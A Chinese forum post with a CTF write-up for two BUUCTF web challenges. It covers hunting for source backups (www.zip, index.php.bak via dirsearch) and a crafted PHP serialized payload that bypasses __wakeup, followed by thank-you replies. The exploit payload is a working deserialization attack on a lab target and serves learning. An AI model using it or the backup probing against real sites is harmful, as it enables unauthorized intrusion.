社区 › 科技 › BUUCTF-Web方向16-20wp

周冰心 发表于 2025-6-7 13:26:24

BUUCTF-Web方向16-20wp

[极客大挑战 2019]PHP

由内容提示应该存在源码备份，常见的如下，一个个尝试
后缀：tar tar.gz zip rar
名字：www web website backup back wwwroot temp访问www.zip，下载下来

解压查看

index.php

flag.php

class.php
结果如下
<?php
class Name{
    private $username = 'admin';
    private $password = 100;
}
$A=new Name();
echo serialize($A);
?>

[*]这里需要绕过__wakeup函数，而__wakeup函数存在一个特性，当成员属性数目大于实际数目时才可绕过wakeup
[*]由于序列化的存在空字符，故需要%00来代替，即空字符的url编码
O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}拿到flag

BackupFile

题目提示备份文件
后缀：tar tar.gz zip rar
名字：www web website backup back wwwroot temp除了以上这些，还有.bak/.swp/.old，都可以试试
这里使用dirsearch扫出来index.php.bak文件，下载下来

使用记事本打开

简千叶 发表于 2025-11-14 18:54:11

感谢分享

坏级尹 发表于 2025-12-8 05:16:46

过来提前占个楼

越蔓蔓 发表于 2025-12-22 18:53:52

感谢分享

岳娅纯 发表于 2025-12-24 04:58:01

感谢分享，学习下。

庞环 发表于 2025-12-26 21:33:32

这个有用。

告陕无 发表于 2026-1-3 22:07:24

感谢发布原创作品，程序园因你更精彩

龙骋唧 发表于 2026-1-22 18:07:42

分享、互助 让互联网精神温暖你我

兑谓 发表于 2026-1-25 01:26:18

懂技术并乐意极积无私分享的人越来越少。珍惜

姚望舒 发表于 2026-1-26 06:51:12

很好很强大我过来先占个楼 待编辑

沃盼盼 发表于 2026-1-27 05:42:44

很好很强大我过来先占个楼 待编辑

创蟀征 发表于 2026-1-27 07:34:36

感谢分享，下载保存了，貌似很强大

佟棠华 发表于 2026-1-28 05:50:59

分享、互助 让互联网精神温暖你我

方方仪 发表于 2026-1-29 03:48:34

用心讨论，共获提升！

澹台忆然 发表于 2026-2-7 21:55:41

收藏一下   不知道什么时候能用到

胥望雅 发表于 2026-2-8 03:12:51

谢谢分享，辛苦了

胁冉右 发表于 2026-2-9 10:05:47

感谢分享，下载保存了，貌似很强大

徙办 发表于 2026-2-9 13:09:32

谢谢分享，辛苦了

二艰糖 发表于 2026-2-9 14:25:37

不错，里面软件多更新就更好了

当贵 发表于 2026-2-9 18:38:20

谢谢分享，辛苦了

查看完整版本: BUUCTF-Web方向16-20wp